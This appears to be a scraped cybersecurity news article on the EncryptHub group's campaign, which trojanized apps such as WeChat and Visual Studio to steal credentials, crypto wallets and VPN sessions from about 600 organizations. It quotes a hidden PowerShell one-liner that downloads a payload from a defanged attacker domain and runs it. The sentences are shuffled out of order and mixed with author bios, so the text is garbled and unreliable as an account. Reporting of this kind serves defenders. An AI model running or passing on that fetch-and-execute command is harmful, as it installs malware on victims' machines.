The multi-stage attack begins with the execution of a PowerShell command that downloads the first-stage payload: “powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ‘hxxps://encrypthub[.]us/encrypthub/fickle/payload.ps1’/ InvokeExpression””. The threat actor has been observed targeting users of popular applications by distributing trojanized versions of software such as QQ Talk, WeChat, Microsoft Visual Studio 2022, and Palo Alto Global Protect. The attackers have also leveraged third-party distribution channels, including a pay-per-install service called “LabInstalls” that operates via a Telegram bot, allowing them to expand their reach and automate the deployment of malicious payloads to unsuspecting victims. The group is also developing “EncryptRAT,” a command-and-control panel that manages infections and sends remote commands, suggesting they may soon commercialize this tool to other threat actors. Outpost24’s KrakenLabs researchers discovered that EncryptHub prioritizes credential logs stolen from victims based on cryptocurrency ownership, corporate network affiliation, and the presence of VPN software, indicating sophisticated targeting methods. The threat actor exploited operational security mistakes, inadvertently exposing critical elements of their infrastructure, which allowed researchers to map their tactics with unprecedented depth. As of February 4th, 2025, the group began using a new certificate registered to “Encrypthub LLC,” further demonstrating their evolving tactics. These applications were signed with code-signing certificates to appear legitimate, including one registered to “HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY” which has since been revoked. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. EncryptHub’s campaign employs several layers of PowerShell scripts to gather system data, exfiltrate valuable information, execute evasion techniques, and deploy information stealers. A sophisticated cybercriminal group known as EncryptHub has successfully compromised approximately 600 organizations through a multi-stage malware campaign. A sophisticated malware toolkit known as Ragnar Loader has been identified as a critical component in targeted ransomware attacks. Organizations are advised to implement multi-layered security strategies and continuous monitoring to protect against this evolving threat. This initial payload is responsible for stealing sensitive data including messaging sessions, crypto wallets, password manager files, and VPN sessions. The third stage employs an HTML loader that instructs Windows Defender to exclude the TEMP folder from scans and downloads additional scripts. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. EncryptHub’s kill chain show the progression from initial execution through multiple stages to final payload deployment.
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 11 Mar 2025 07:30:06 +0000